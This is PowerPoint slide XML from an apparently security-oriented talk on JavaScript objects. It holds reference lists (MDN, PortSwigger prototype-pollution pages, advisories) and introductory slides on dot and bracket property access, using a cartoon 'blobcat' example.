              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Boolean#boolean_coercion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#instance_methods</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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41281507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 3</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2"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#null-prototype_objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/assign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/constructor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/getPrototypeOf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto#browser_compatibility</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/seal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/setPrototypeOf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/toString</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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37368451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 4</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2"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#bracket_notation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#dot_notation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Spread_syntax#comparing_with_object.assign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof#typeof_null</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://docs.python.org/3/library/stdtypes.html#instance.__class__</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://gist.github.com/matthiasak/c3c9c40d0f98ca91def1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://github.com/advisories/GHSA-2j2x-2gpw-g8fm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://github.com/hughsk/flat/issues/105</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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26940380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References 5</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pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/ljharb/qs#readme</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://nodejs.org/en/download</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/prototype-pollution#how-do-prototype-pollution-vulnerabilities-arise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/prototype-pollution/preventing#sanitizing-property-keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://pugjs.org/language/code.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://tc39.es/ecma262/#sec-ordinary-object-internal-methods-and-internal-slots</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="488950" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://web.archive.org/web/20201109113214/https://blog.p6.is/AST-Injection/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291556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1ABB9-0358-AFEF-6197-33B7F6C264A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>QwQ&amp;A</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>(please go easy)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2249ADD-0554-AB03-8ACC-509D5DA716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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13550373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7F48-7079-A964-9E9C-00D50D380572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>End</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{159827B1-AC18-2D60-6417-7B675DBAFA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1645191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access</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We need to reeducate the naughty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Two main equivalent ways to access object properties: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>dot notation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1] or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>bracket notation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.personality</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'evil'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"hand"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highligh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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Same syntax for modifying object properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>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"personality"</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err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.hand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"heart"</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'heart'</a:t>
            </a:r>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 personality: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hand: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'heart'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="11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10" name="Picture 9" descr="A yellow cat with a knife">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1798E833-E74A-245D-C79A-1D0D8054EAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583381" y="1838995"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A cartoon cat with a heart">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF71ACAB-D6DF-2B5E-F15E-F1A1CA81FB6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583381" y="3423410"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864EDEC9-A526-C436-07A4-F538AB6B232B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="6230767" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#dot_notation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#bracket_notation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80921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access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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> wants longer whiskers to look more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>UwU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>…!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Property access can be chained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>blobcat.personality.padStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42</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a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"_.-."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</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005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'_.-._.-._.-._.-._.-._.-._.-._.-._.-._.-</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a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// The line above is equivalent to 2 lines of code below.</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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
